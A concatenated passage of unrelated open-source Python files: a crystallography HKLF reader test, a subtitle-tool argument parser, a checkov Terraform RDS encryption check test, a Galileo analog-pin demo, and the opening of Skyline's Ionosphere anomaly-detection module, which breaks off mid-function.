' 0 0 0 0. 0. 0\n')
r = hklf.reader(file_object=StringIO(s))
assert list(r.indices()) == [(1, 2, -1), (-2, 1, 3)]
assert approx_equal(r.data(), [23, -1])
assert approx_equal(r.sigmas(), [4, 3])
assert approx_equal(r.alphas(), [2, 1])
assert r.wavelengths() is None
s = (' 3 2 -1 32. 5.\n'
' 0 0 0\n')
r = hklf.reader(file_object=StringIO(s))
assert list(r.indices()) == [(3, 2, -1)]
assert approx_equal(r.data(), [32])
assert approx_equal(r.sigmas(), [5])
assert r.alphas() is None
assert r.wavelengths() is None
s = (
"""King Arthur: [after Arthur's cut off both of the Black Knight's arms]
Look, you stupid Bastard. You've got no arms left.
Black Knight: Yes I have.
King Arthur: *Look*!
Black Knight: It's just a flesh wound.""")
try: r = hklf.reader(file_object=StringIO(s))
except RuntimeError: pass
else: raise Exception_expected
def exercise_miller_export_as_shelx_hklf():
s = """\
1 2 -1 23.34 4.56
2 -3 9 12.45 6.12
99999999999999999.9999999.99
-999-999-999-9999.99-9999.99
3 4 5999999.99999999.
3 4 5-99999.9-999999.
"""
ma = hklf.reader(file_object=StringIO(s)).as_miller_arrays()[0]
sio = StringIO()
ma.export_as_shelx_hklf(file_object=sio)
ma2 = hklf.reader(file_object=StringIO(sio.getvalue())).as_miller_arrays()[0]
assert approx_equal(ma.indices(), ma2.indices())
assert approx_equal(ma.data(), ma2.data())
assert approx_equal(ma.sigmas(), ma2.sigmas())
assert ma.anomalous_flag() is False
assert ma2.anomalous_flag() is False
#
ma = ma.select(flex.size_t([0]))
def check(d, s, f):
if (s is not None): s = flex.double([s])
ma2 = ma.array(data=flex.double([d]), sigmas=s)
sio = StringIO()
ma2.export_as_shelx_hklf(sio, normalise_if_format_overflow=True)
assert not show_diff(sio.getvalue(), """\
1 2 -1%s
0 0 0 0.00 0.00
""" % f)
try: ma2.export_as_shelx_hklf(sio)
except RuntimeError: pass
else: raise Exception_expected
check(-12345678, 1, "-999999. 0.08")
check(-12345678, None, "-999999. 0.00")
check(2, -12345678, " 0.16-999999.")
check(123456789, 30, "9999999. 2.43")
check(123456789, None, "9999999. 0.00")
check(40, 123456789, " 3.249999999.")
check(-23456789, 123456789, "-999999.5263153.")
check(123456789, -23456789, "5263153.-999999.")
#
ma = hklf.reader(file_object=StringIO(s)).as_miller_arrays()[0]
ma = ma.select(flex.size_t([0,1]))
ma2 = ma.array(data=flex.double([123456789, -23456789]))
sio = StringIO()
ma2.export_as_shelx_hklf(sio, normalise_if_format_overflow=True)
assert not show_diff(sio.getvalue(), """\
1 2 -15263153. 0.00
2 -3 9-999999. 0.00
0 0 0 0.00 0.00
""")
ma2 = ma.array(data=flex.double([-23456789, 823456789]))
sio = StringIO()
ma2.export_as_shelx_hklf(sio, normalise_if_format_overflow=True)
assert not show_diff(sio.getvalue(), """\
1 2 -1-284858. 0.00
2 -3 99999999. 0.00
0 0 0 0.00 0.00
""")
# Test that setting the scale range works.
ma2.export_as_shelx_hklf(
sio,
scale_range=(-9999., 9999.),
normalise_if_format_overflow=True)
# Test that ignoring the scale range and normalising out-of-range values anyway works.
ma2.export_as_shelx_hklf(sio, full_dynamic_range=True)
def run():
exercise_hklf_reader()
exercise_miller_export_as_shelx_hklf()
print("OK")
if __name__ == '__main__':
run()
|
srt_tools/utils.py | xl8-ai/srt | 285 | 12610614 | #!/usr/bin/env python
import argparse
import codecs
import srt
import logging
import sys
import itertools
import collections
import os
PROG_NAME = os.path.basename(sys.argv[0]).replace("-", " ", 1)
STDIN_BYTESTREAM = getattr(sys.stdin, "buffer", sys.stdin)
STDOUT_BYTESTREAM = getattr(sys.stdout, "buffer", sys.stdout)
DASH_STREAM_MAP = {"input": STDIN_BYTESTREAM, "output": STDOUT_BYTESTREAM}
try: # Python 2
range = xrange # pytype: disable=name-error
except NameError:
pass
log = logging.getLogger(__name__)
def noop(stream):
"""
Used when we didn't explicitly specify a stream to avoid using
codecs.get{reader,writer}
"""
return stream
def dash_to_stream(arg, arg_type):
if arg == "-":
return DASH_STREAM_MAP[arg_type]
return arg
def basic_parser(
description=None,
multi_input=False,
no_output=False,
examples=None,
hide_no_strict=False,
):
example_lines = []
if examples is not None:
example_lines.append("examples:")
for desc, code in examples.items():
example_lines.append(" {}".format(desc))
example_lines.append(" $ {}\n".format(code))
parser = argparse.ArgumentParser(
prog=PROG_NAME,
description=description,
epilog="\n".join(example_lines),
formatter_class=argparse.RawDescriptionHelpFormatter,
)
# Cannot use argparse.FileType as we need to know the encoding from the
# args
if multi_input:
parser.add_argument(
"--input",
"-i",
metavar="FILE",
action="append",
type=lambda arg: dash_to_stream(arg, "input"),
help="the files to process",
required=True,
)
else:
parser.add_argument(
"--input",
"-i",
metavar="FILE",
default=STDIN_BYTESTREAM,
type=lambda arg: dash_to_stream(arg, "input"),
help="the file to process (default: stdin)",
)
if not no_output:
parser.add_argument(
"--output",
"-o",
metavar="FILE",
default=STDOUT_BYTESTREAM,
type=lambda arg: dash_to_stream(arg, "output"),
help="the file to write to (default: stdout)",
)
if not multi_input:
parser.add_argument(
"--inplace",
"-p",
action="store_true",
help="modify file in place",
)
shelp = "allow blank lines in output, your media player may explode"
if hide_no_strict:
shelp = argparse.SUPPRESS
parser.add_argument("--no-strict", action="store_false", dest="strict", help=shelp)
parser.add_argument(
"--debug",
action="store_const",
dest="log_level",
const=logging.DEBUG,
default=logging.INFO,
help="enable debug logging",
)
parser.add_argument(
"--ignore-parsing-errors",
"-c",
action="store_true",
help="try to keep going, even if there are parsing errors",
)
parser.add_argument(
"--encoding", "-e", help="the encoding to read/write files in (default: utf8)"
)
return parser
def set_basic_args(args):
# TODO: dedupe some of this
if getattr(args, "inplace", None):
if args.input == DASH_STREAM_MAP["input"]:
raise ValueError("Cannot use --inplace on stdin")
if args.output != DASH_STREAM_MAP["output"]:
raise ValueError("Cannot use -o and -p together")
args.output = args.input
for stream_name in ("input", "output"):
log.debug('Processing stream "%s"', stream_name)
try:
stream = getattr(args, stream_name)
except AttributeError:
# For example, in the case of no_output
continue
# We don't use system default encoding, because usually one runs this
# on files they got from elsewhere. As such, be opinionated that these
# files are probably UTF-8. Looking for the BOM on reading allows us to
# be more liberal with what we accept, without adding BOMs on write.
read_encoding = args.encoding or "utf-8-sig"
write_encoding = args.encoding or "utf-8"
r_enc = codecs.getreader(read_encoding)
w_enc = codecs.getwriter(write_encoding)
log.debug("Got %r as stream", stream)
# We don't use encoding= option to open because we want to have the
# same universal newlines behaviour as STD{IN,OUT}_BYTESTREAM
if stream in DASH_STREAM_MAP.values():
log.debug("%s in DASH_STREAM_MAP", stream_name)
if stream is args.input:
args.input = srt.parse(
r_enc(args.input).read(), ignore_errors=args.ignore_parsing_errors
)
elif stream is args.output:
# Since args.output is not in text mode (since we didn't
# earlier know the encoding), we have no universal newline
# support and need to do it ourselves
args.output = w_enc(args.output)
else:
log.debug("%s not in DASH_STREAM_MAP", stream_name)
if stream is args.input:
if isinstance(args.input, collections.MutableSequence):
for i, input_fn in enumerate(args.input):
if input_fn in DASH_STREAM_MAP.values():
if stream is args.input:
args.input[i] = srt.parse(
r_enc(input_fn).read(),
ignore_errors=args.ignore_parsing_errors,
)
else:
f = r_enc(open(input_fn, "rb"))
with f:
args.input[i] = srt.parse(
f.read(), ignore_errors=args.ignore_parsing_errors
)
else:
f = r_enc(open(stream, "rb"))
with f:
args.input = srt.parse(
f.read(), ignore_errors=args.ignore_parsing_errors
)
else:
args.output = w_enc(open(args.output, "wb"))
def compose_suggest_on_fail(subs, strict=True):
try:
return srt.compose(subs, strict=strict, eol=os.linesep, in_place=True)
except srt.SRTParseError as thrown_exc:
# Since `subs` is actually a generator
log.critical(
"Parsing failed, maybe you need to pass a different encoding "
"with --encoding?"
)
raise
def sliding_window(seq, width=2, inclusive=True):
"""
If inclusive is True, we also include final elements where len(sliced) <
width.
"""
seq_iter = iter(seq)
# Consume seq_iter up to width
sliced = tuple(itertools.islice(seq_iter, width))
if not inclusive and len(sliced) != width:
return
yield sliced
for elem in seq_iter:
sliced = sliced[1:] + (elem,)
yield sliced
if inclusive:
for idx in range(len(sliced)):
if idx != 0:
yield sliced[idx:]
|
tests/terraform/checks/resource/aws/test_RDSClusterEncrypted.py | jamesholland-uk/checkov | 4,013 | 12610624 | import unittest
import hcl2
from checkov.terraform.checks.resource.aws.RDSClusterEncrypted import check
from checkov.common.models.enums import CheckResult
class TestRDSClusterEncrypted(unittest.TestCase):
def test_failure(self):
hcl_res = hcl2.loads("""
resource "aws_rds_global_cluster" "example" {
provider = aws.primary
global_cluster_identifier = "example"
}
""")
resource_conf = hcl_res['resource'][0]['aws_rds_global_cluster']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_failure_explicit(self):
hcl_res = hcl2.loads("""
resource "aws_rds_global_cluster" "example" {
provider = aws.primary
global_cluster_identifier = "example"
storage_encrypted = false
}
""")
resource_conf = hcl_res['resource'][0]['aws_rds_global_cluster']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.FAILED, scan_result)
def test_success(self):
hcl_res = hcl2.loads("""
resource "aws_rds_global_cluster" "example" {
provider = aws.primary
global_cluster_identifier = "example"
storage_encrypted = true
}
""")
resource_conf = hcl_res['resource'][0]['aws_rds_global_cluster']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.PASSED, scan_result)
def test_success_with_source_db_cluster_identifier(self):
hcl_res = hcl2.loads("""
resource "aws_rds_global_cluster" "example" {
provider = aws.primary
global_cluster_identifier = "example"
source_db_cluster_identifier = "some_arn"
}
""")
resource_conf = hcl_res['resource'][0]['aws_rds_global_cluster']['example']
scan_result = check.scan_resource_conf(conf=resource_conf)
self.assertEqual(CheckResult.UNKNOWN, scan_result)
if __name__ == '__main__':
unittest.main()
|
pingo/examples/galileo_analog_bars.py | rbanffy/pingo | 116 | 12610636 | <filename>pingo/examples/galileo_analog_bars.py<gh_stars>100-1000
import pingo
import time
board = pingo.galileo.Galileo2()
pot = board.pins['A0']
pot.mode = pingo.ANALOG
def bar(pin):
print "*" * int(pin.ratio() * 70)
while True:
bar(pot)
time.sleep(0.05)
|
skyline/ionosphere/ionosphere.py | datastreaming/skyline-1 | 396 | 12610656 | from __future__ import division
import logging
import os
from os import kill, getpid, listdir
from os.path import join, isfile
from sys import version_info
# @modified 20191115 - Branch #3262: py3
# try:
# from Queue import Empty
# except:
# from queue import Empty
from time import time, sleep
from threading import Thread
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets in place of Manager().list to reduce memory and number of
# processes
# from multiprocessing import Process, Manager
from multiprocessing import Process
import re
from shutil import rmtree
# @added 20200813 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
from shutil import move as shutil_move
# import csv
from ast import literal_eval
from datetime import datetime
# from redis import StrictRedis
import traceback
from timeit import default_timer as timer
import mysql.connector
# from mysql.connector import errorcode
from sqlalchemy.sql import select
# @added 20180715 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
from sqlalchemy.sql import desc
# @added 20161213 - Branch #1790: test_tsfresh
# To match the new order introduced via the test_tsfresh method
import numpy as np
# import pandas as pd
# @added 20170107 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Feature #1844: ionosphere_matched DB table
from tsfresh import __version__ as tsfresh_version
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
from pymemcache.client.base import Client as pymemcache_Client
# @added 20180617 - Feature #2404: Ionosphere - fluid approximation
import pandas as pd
from tsfresh.feature_extraction import (
# @modified 20210101 - Task #3928: Update Skyline to use new tsfresh feature extraction method
# extract_features, ReasonableFeatureExtractionSettings)
extract_features, EfficientFCParameters)
import settings
from skyline_functions import (
fail_check, mysql_select, write_data_to_file, send_graphite_metric,
# @added 20170825 - Task #2132: Optimise Ionosphere DB usage
# @modified 20190408 - Feature #2484: FULL_DURATION feature profiles
# Moved to common_functions
# get_memcache_metric_object)
mkdir_p,
# @added 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Added a single functions to deal with Redis connection and the
# charset='utf-8', decode_responses=True arguments required in py3
get_redis_conn, get_redis_conn_decoded,
# @added 20200714 - Bug #3644: Do not apply ionosphere_busy to batch processing metrics
# Feature #3480: batch_processing
is_batch_metric)
# @added 20161221 - calculate features for every anomaly, instead of making the
# user do it in the frontend or calling the webapp constantly in a cron like
# manner. Decouple Ionosphere from the webapp.
from features_profile import calculate_features_profile
# @modified 20170107 - Feature #1844: ionosphere_matched DB table
# Added ionosphere_matched_meta
from database import (
get_engine, ionosphere_table_meta,
# @added 20170825 - Task #2132: Optimise Ionosphere DB usage
# @modified 20190408 - Feature #2484: FULL_DURATION feature profiles
# Moved to common_functions
# metrics_table_meta,
ionosphere_matched_table_meta,
# @added 20200516 - Bug #3546: Change ionosphere_enabled if all features profiles are disabled
# Readded metrics_table to set ionosphere_enabled to 0 if a metric has no
# fps enabled and has been willy nillied
metrics_table_meta,
# @added 20210412 - Feature #4014: Ionosphere - inference
# Branch #3590: inference
motifs_matched_table_meta,
# @added 20210414 - Feature #4014: Ionosphere - inference
# Branch #3590: inference
not_anomalous_motifs_table_meta,
)
# @added 20210425 - Task #4030: refactoring
# Feature #4014: Ionosphere - inference
from functions.numpy.percent_different import get_percent_different
from tsfresh_feature_names import TSFRESH_FEATURES
# @added 20170114 - Feature #1854: Ionosphere learn
# @modified 20170117 - Feature #1854: Ionosphere learn - generations
# Renamed the function from simple learn to the meme it has become
# from learn import learn
from learn import ionosphere_learn
# @added 20170306 - Feature #1960: ionosphere_layers
from layers import run_layer_algorithms
# @added 20190322 - Feature #2484: FULL_DURATION feature profiles
from common_functions import (
get_metrics_db_object, get_calculated_features)
# @added 20190327 - Feature #2484
from echo import ionosphere_echo
# @added 20210702 - Feature #4152: DO_NOT_SKIP_SKYLINE_FEEDBACK_NAMESPACES
from matched_or_regexed_in_list import matched_or_regexed_in_list
skyline_app = 'ionosphere'
skyline_app_logger = '%sLog' % skyline_app
logger = logging.getLogger(skyline_app_logger)
skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
skyline_app_loglock = '%s.lock' % skyline_app_logfile
skyline_app_logwait = '%s.wait' % skyline_app_logfile
python_version = int(version_info[0])
this_host = str(os.uname()[1])
# Converting one settings variable into a local variable, just because it is a
# long string otherwise.
try:
ENABLE_IONOSPHERE_DEBUG = settings.ENABLE_IONOSPHERE_DEBUG
except:
logger.error('error :: cannot determine ENABLE_IONOSPHERE_DEBUG from settings')
ENABLE_IONOSPHERE_DEBUG = False
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
except:
SERVER_METRIC_PATH = ''
# @added 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# Number of processes to assign to Ionosphere, however Ionosphere should never
# need more than 1 and is effectively hard coded as such currently. This
# variable is only declared for the purpose of maintaining a standard set up in
# each module and to possibly enable more than one processor on Ionosphere in
# the future, should there be a requirement for Ionosphere to analyse the
# metrics quicker. Running Ionosphere with more than one process is untested
# and currently it is hard coded to be 1
# (https://github.com/earthgecko/skyline/issues/69)
try:
IONOSPHERE_PROCESSES = settings.IONOSPHERE_PROCESSES
if IONOSPHERE_PROCESSES != 1:
IONOSPHERE_PROCESSES = 1
except:
IONOSPHERE_PROCESSES = 1
# @added 20190524 - Bug #3050: Ionosphere - Skyline and Graphite feedback
# Do not run checks if namespace has matched multiple times in the
# last 10 minutes. However determining which Skyline related metrics
# are feeding back are quite difficult to ascetain. So use the
# ionosphere_busy logic again and use or find the skyline host namespace
# and if busy do not analyse the Skyline host namespace while
# ionosphere is busy.
try:
# @modified 20200606 - Bug #3572: Apply list to settings import
SKYLINE_FEEDBACK_NAMESPACES = list(settings.SKYLINE_FEEDBACK_NAMESPACES)
except:
# Let us take a guess
try:
graphite_host = str(settings.GRAPHITE_HOST)
graphite_hostname = graphite_host.split('.', -1)[0]
SKYLINE_FEEDBACK_NAMESPACES = [settings.SERVER_METRICS_NAME, graphite_hostname]
except:
SKYLINE_FEEDBACK_NAMESPACES = [this_host]
# @added 20210702 - Feature #4152: DO_NOT_SKIP_SKYLINE_FEEDBACK_NAMESPACES
try:
DO_NOT_SKIP_SKYLINE_FEEDBACK_NAMESPACES = list(settings.DO_NOT_SKIP_SKYLINE_FEEDBACK_NAMESPACES)
except:
DO_NOT_SKIP_SKYLINE_FEEDBACK_NAMESPACES = []
# @added 20200330 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
try:
IONOSPHERE_MANAGE_PURGE = settings.IONOSPHERE_MANAGE_PURGE
except:
IONOSPHERE_MANAGE_PURGE = True
# @added 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
try:
from settings import BATCH_PROCESSING
except:
BATCH_PROCESSING = None
try:
# @modified 20200606 - Bug #3572: Apply list to settings import
# from settings import BATCH_PROCESSING_NAMESPACES
BATCH_PROCESSING_NAMESPACES = list(settings.BATCH_PROCESSING_NAMESPACES)
except:
BATCH_PROCESSING_NAMESPACES = []
# @added 20200813 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
try:
IONOSPHERE_HISTORICAL_DATA_FOLDER = settings.IONOSPHERE_HISTORICAL_DATA_FOLDER
except:
IONOSPHERE_HISTORICAL_DATA_FOLDER = '/opt/skyline/ionosphere/historical_data'
try:
IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR = settings.IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
except:
IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR = []
# @added 20210412 - Feature #4014: Ionosphere - inference
# Branch #3590: inference
try:
IONOSPHERE_INFERENCE_MOTIFS_ENABLED = settings.IONOSPHERE_INFERENCE_MOTIFS_ENABLED
except:
IONOSPHERE_INFERENCE_MOTIFS_ENABLED = True
if IONOSPHERE_INFERENCE_MOTIFS_ENABLED:
from inference import ionosphere_motif_inference
else:
ionosphere_motif_inference = None
try:
IONOSPHERE_INFERENCE_MOTIFS_TEST_ONLY = settings.IONOSPHERE_INFERENCE_MOTIFS_TEST_ONLY
except:
IONOSPHERE_INFERENCE_MOTIFS_TEST_ONLY = False
# @added 20210419 - Feature #4014: Ionosphere - inference
# Only store motif data in the database if specifically enabled
try:
IONOSPHERE_INFERENCE_STORE_MATCHED_MOTIFS = settings.IONOSPHERE_INFERENCE_STORE_MATCHED_MOTIFS
except:
IONOSPHERE_INFERENCE_STORE_MATCHED_MOTIFS = False
# @added 20210512 - Feature #4064: VERBOSE_LOGGING
try:
VERBOSE_LOGGING = settings.IONOSPHERE_VERBOSE_LOGGING
except:
VERBOSE_LOGGING = False
skyline_app_graphite_namespace = 'skyline.%s%s' % (skyline_app, SERVER_METRIC_PATH)
max_age_seconds = settings.IONOSPHERE_CHECK_MAX_AGE
# Database configuration
config = {'user': settings.PANORAMA_DBUSER,
'password': <PASSWORD>,
'host': settings.PANORAMA_DBHOST,
'port': settings.PANORAMA_DBPORT,
'database': settings.PANORAMA_DATABASE,
'raise_on_warnings': True}
failed_checks_dir = '%s_failed' % settings.IONOSPHERE_CHECK_PATH
last_purge_key = '%s.last_purge_ts' % skyline_app
LOCAL_DEBUG = False
class Ionosphere(Thread):
"""
The Ionosphere class which controls the ionosphere thread and spawned
processes.
"""
def __init__(self, parent_pid):
"""
Initialize Ionosphere
Define Redis, mysql and memcached connections
"""
super(Ionosphere, self).__init__()
# @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Use get_redis_conn and get_redis_conn_decoded
# if settings.REDIS_PASSWORD:
# self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
# else:
# self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
# @added 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Added a single functions to deal with Redis connection and the
# charset='utf-8', decode_responses=True arguments required in py3
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
self.daemon = True
self.parent_pid = parent_pid
self.current_pid = getpid()
self.mysql_conn = mysql.connector.connect(**config)
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Task #3032: Debug number of Python processes and memory use
# Branch #3002: docker
# Reduce amount of Manager instances that are used as each requires a
# copy of entire memory to be copied into each subprocess so this
# results in a python process per Manager instance, using as much
# memory as the parent. OK on a server, not so much in a container.
# Disabled all the Manager().list() below and replaced with Redis sets
# self.anomalous_metrics = Manager().list()
# self.not_anomalous = Manager().list()
# self.features_profiles_checked = Manager().list()
# self.training_metrics = Manager().list()
# self.sent_to_panorama = Manager().list()
# @added 20170108 - Feature #1830: Ionosphere alerts
# Added lists of ionosphere_smtp_alerter_metrics and
# ionosphere_non_smtp_alerter_metrics
# self.ionosphere_smtp_alerter_metrics = Manager().list()
# self.ionosphere_non_smtp_alerter_metrics = Manager().list()
# @added 20170306 - Feature #1960: ionosphere_layers
# self.layers_checked = Manager().list()
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
if settings.MEMCACHE_ENABLED:
self.memcache_client = pymemcache_Client((settings.MEMCACHED_SERVER_IP, settings.MEMCACHED_SERVER_PORT), connect_timeout=0.1, timeout=0.2)
else:
self.memcache_client = None
def check_if_parent_is_alive(self):
"""
Self explanatory
"""
try:
kill(self.current_pid, 0)
kill(self.parent_pid, 0)
except:
# @added 20201203 - Bug #3856: Handle boring sparsely populated metrics in derivative_metrics
# Log warning
logger.warn('warning :: parent or current process dead')
exit(0)
"""
These are the ionosphere mysql functions used to surface and input
ionosphere data for timeseries.
"""
def mysql_insert(self, insert):
"""
Insert data into mysql table
:param insert: the insert string
:type insert: str
:return: int
:rtype: int or boolean
- **Example usage**::
query = 'insert into host (host) VALUES (\'this_host\')'
result = self.mysql_insert(query)
.. note::
- If the MySQL query fails a boolean will be returned not a tuple
* ``False``
* ``None``
"""
try:
cnx = mysql.connector.connect(**config)
if ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: connected to mysql')
except mysql.connector.Error as err:
logger.error('error :: mysql error - %s' % str(err))
logger.error('error :: failed to connect to mysql')
raise
if cnx:
try:
cursor = cnx.cursor()
cursor.execute(insert)
inserted_id = cursor.lastrowid
# Make sure data is committed to the database
cnx.commit()
cursor.close()
cnx.close()
return inserted_id
except mysql.connector.Error as err:
logger.error('error :: mysql error - %s' % str(err))
logger.error('Failed to insert record')
cnx.close()
raise
else:
cnx.close()
return False
return False
def purge_old_data_dirs(self, dir_path, older_than):
time_now = time()
# @added 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Still manage ionsphere.training_data
if IONOSPHERE_MANAGE_PURGE:
logger.info('Cleaning old training data from %s older than %s seconds' % (
dir_path, str(older_than)))
else:
logger.info('IONOSPHERE_MANAGE_PURGE set to False managing ionosphere.training_data only, not purging')
# @added 20200409 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# If training_data is not purged and contains the correct training_data
# files, add it to the list to be added to the Redis set
training_data_list = []
# @added 20200625 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# Added occassional logging for monitoring
last_log_time = int(time_now)
try:
for path, folders, files in os.walk(dir_path):
for folder in folders[:]:
# @added 20200625 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# Added occassional logging for monitoring
current_time = int(time())
last_logged = current_time - last_log_time
if last_logged > 29:
# @modified 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Still manage ionsphere.training_data
if IONOSPHERE_MANAGE_PURGE:
logger.info('still purging')
else:
logger.info('still managing ionosphere.training_data')
last_log_time = current_time
# @added 20200626 - Feature #3472: ionosphere.training_data Redis set
# Report app up to stop other apps not finding the
# ionosphere key in Redis
try:
self.redis_conn.setex(skyline_app, 120, current_time)
logger.info('updated Redis key for %s up' % skyline_app)
except:
logger.error('error :: failed to update Redis key for %s up' % skyline_app)
folder_path = os.path.join(path, folder)
# Only timestamped directories are removed
if re.match('\d{10}', folder):
if ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: matched - %s' % folder_path)
# @modified 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Still manage ionosphere.training_data
if IONOSPHERE_MANAGE_PURGE:
if (time_now - os.path.getmtime(folder_path)) > older_than:
# @added 20200813 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
if IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR:
for rpath, rfolders, rfiles in os.walk(folder_path):
for rfolder in rfolders[:]:
current_folder = os.path.join(rpath, rfolder)
for rrpath, rrfolders, rrfiles in os.walk(current_folder):
move_files = False
training_files_dirs = []
if len(rrfiles) > 0:
for rfile in rrfiles:
for include_namespace in IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR:
if include_namespace in rfile:
move_files = True
if move_files:
training_files_dirs.append(rrpath)
if training_files_dirs:
try:
dest_path = rrpath.replace(dir_path, IONOSPHERE_HISTORICAL_DATA_FOLDER)
if not os.path.exists(dest_path):
mkdir_p(dest_path)
training_files = []
for training_files_dir in training_files_dirs:
training_files = os.listdir(training_files_dir)
for f in training_files:
src_file = '%s/%s' % (training_files_dir, f)
dest_file = '%s/%s' % (dest_path, f)
shutil_move(src_file, dest_file)
files_moved = True
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to move files from %s to %s' % (current_folder, IONOSPHERE_HISTORICAL_DATA_FOLDER))
files_moved = False
if files_moved:
try:
rmtree(rrpath)
logger.info('removed - %s as files were moved to %s' % (rrpath, dest_path))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to rmtree %s' % rrpath)
try:
rmtree(folder_path)
logger.info('removed - %s' % folder_path)
except:
logger.error('error :: failed to rmtree %s' % folder_path)
# @added 20200409 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
else:
if settings.IONOSPHERE_DATA_FOLDER in folder_path:
training_data_list.append(folder_path)
# @added 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Still manage ionosphere.training_data
else:
if settings.IONOSPHERE_DATA_FOLDER in folder_path:
training_data_list.append(folder_path)
except:
logger.info(traceback.format_exc())
logger.error('error :: purge_old_data_dirs - os.walk')
# @added 20200529 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# @modified 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Still manage ionosphere.training_data
if IONOSPHERE_MANAGE_PURGE:
logger.info('cleaned old training data')
# @added 20200813 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
# Declare training_data_instances even if no training_data_list exists
# as it can be appended to by the historical training data
training_data_instances = []
# @added 20200409 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
if training_data_list:
training_data_instances = []
for training_data_dir in training_data_list:
# @added 20200625 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# Added occassional logging for monitoring
current_time = int(time())
last_logged = current_time - last_log_time
if last_logged > 29:
logger.info('still creating training_data Redis set')
last_log_time = current_time
# @added 20200626 - Feature #3472: ionosphere.training_data Redis set
# Report app up to stop other apps not finding the
# ionosphere key in Redis
try:
self.redis_conn.setex(skyline_app, 120, current_time)
logger.info('updated Redis key for %s up' % skyline_app)
except:
logger.error('error :: failed to update Redis key for %s up' % skyline_app)
for path, folders, files in os.walk(training_data_dir):
# @modified 20200529 - Feature #3472: ionosphere.training_data Redis set
# Feature #3474: webapp api - training_data
# Wrapped in try and except
try:
add_folder = False
metric = None
timestamp = None
if files:
add_folder = False
metric = None
timestamp = None
# @added 20200815 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
# Declared these first for all
metric_file = None
metric_file_path = None
if '/learn/' in path:
# @modified 20200815 - Feature #3670: IONOSPHERE_CUSTOM_KEEP_TRAINING_TIMESERIES_FOR
# metric_file = None
# metric_file_path = None
continue
for ifile in files:
if ifile.endswith('.png'):
# @added 20210329 - Feature #3978: luminosity - classify_metrics
# Feature #3642: Anomaly type classification
if ifile.startswith('adtk_'):
continue
add_folder = True
if ifile.endswith('.txt'):
if ifile.endswith('.fp.details.txt'):
continue
elif ifile.endswith('.fp.created.txt'):
continue
# @added 20210329 - Feature #3978: luminosity - classify_metrics
# Feature #3642: Anomaly type classification
elif ifile.startswith('adtk_'):
continue
elif ifile == 'data.txt':
continue
else:
metric_file = ifile
metric_file_path = path
if add_folder:
if metric_file and metric_file_path:
metric = metric_file.replace('.txt', '', 1)
path_elements = metric_file_path.split(os.sep)
for element in path_elements:
if re.match('\d{10}', element):
timestamp = int(element)
if metric and timestamp:
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Determine and add resolution
resolution_seconds = settings.FULL_DURATION
for ifile in files:
# @added 20210329 - Feature #3978: luminosity - classify_metrics
# Feature #3642: Anomaly type classification
if ifile.startswith('adtk_'):
continue
if ifile.endswith('.png') and 'mirage' in ifile and 'graphite' in ifile:
try:
ifile_resolution_elements = ifile.replace('.png', '', 1).split('.')
ifile_resolution_str = ifile_resolution_elements[-1]
ifile_resolution = int(ifile_resolution_str.replace('h', '', 1))
resolution_seconds = ifile_resolution * 3600
except:
pass
# @modified 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Added resolution_seconds
